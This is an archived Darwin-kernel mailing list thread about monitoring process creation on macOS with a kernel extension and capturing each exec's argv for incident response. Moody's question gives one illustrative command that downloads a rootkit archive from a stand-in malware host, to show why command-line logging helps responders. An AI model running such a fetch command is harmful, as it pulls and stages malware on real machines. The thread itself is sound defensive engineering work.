• Open Menu Close Menu
  • Apple
  • Shopping Bag
  • Apple
  • Mac
  • iPad
  • iPhone
  • Watch
  • TV
  • Music
  • Support
  • Search apple.com
  • Shopping Bag

Lists

Open Menu Close Menu
  • Terms and Conditions
  • Lists hosted on this site
  • Email the Postmaster
  • Tips for posting to public mailing lists
Re: accessing argv on exec
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: accessing argv on exec

  • Subject: Re: accessing argv on exec
  • From: Peter Moody <email@hidden>
  • Date: Tue, 11 Nov 2014 10:04:44 -0800
On Tue, Nov 11 2014 at 07:18, Evan Lojewski wrote:
> Hi Pete,
>
> From my (limited) scan through kern_exec.c, it doesn't look like there is a
> good way get access to the full command line. Someone at Apple will
> probably be able to suggest a good option.
>
> *IF* this is a non-production kext, it is possible to update the execsw
> table to allow your kext to get access to this information, however it does
> require using private symbols. If you'd like an example on how to do that
> let me know and I'll send some code, but hopefully Apple has a better
> option that they can reply with first.

Hey Evan,

I'd love to see some code. I don't think I'll be able to convince our
macops team to support it, but seeing how it could be done is still
probably worthwhile.

re auditd: we're actually doing something like that right now, but AIUI
our IR team has found it lacking. I've spent the last year or so
implementing for linux what I'm looking to implement here for the mac,
hence the noobish question.

 Cheers,
 peter

> -- Evan Lojewski
>
> On Mon, Nov 10, 2014 at 4:02 PM, Peter Moody <email@hidden> wrote:
>
>> Hey folks,
>>
>> apologies for what will likely be a noobish question, I'm just getting
>> acquainted with xnu and kexts and all that.
>>
>> I'm interested in monitoring process creation (and termination) on the
>> mac. It looks like I can use a kext that registers a listener for
>> kauth_fileop_exec to be notified of an exec, and the callback is:
>>
>>  a) given a char* of the path the binary.
>>  b) run in the context of the newly executing binary (so proc_self()
>>  and the like work for getting pid/ppid, etc).
>>
>> but is there anyway that I can actually access the argv that was passed
>> to the execve call?
>>
>> I'm trying to do this to help our incident response capabilities, where
>> obviously just seeing that 'wget' was called is a lot less informative
>> than seeing 'wget http://malware.badguy/rookkit.tgz'
>>
>>  Cheers,
>>  peter
>>  _______________________________________________
>> Do not post admin requests to the list. They will be ignored.
>> Darwin-kernel mailing list      (email@hidden)
>> Help/Unsubscribe/Update your Subscription:
>>
>> This email sent to email@hidden
 _______________________________________________
Do not post admin requests to the list. They will be ignored.
Darwin-kernel mailing list      (email@hidden)
Help/Unsubscribe/Update your Subscription:

This email sent to email@hidden
  • Follow-Ups:
    • Re: accessing argv on exec
      • From: Evan Lojewski <email@hidden>
References: 
 >accessing argv on exec (From: Peter Moody <email@hidden>)
 >Re: accessing argv on exec (From: Evan Lojewski <email@hidden>)

  • Prev by Date: Re: accessing argv on exec
  • Next by Date: Re: accessing argv on exec
  • Previous by thread: Re: accessing argv on exec
  • Next by thread: Re: accessing argv on exec
  • Index(es):
    • Date
    • Thread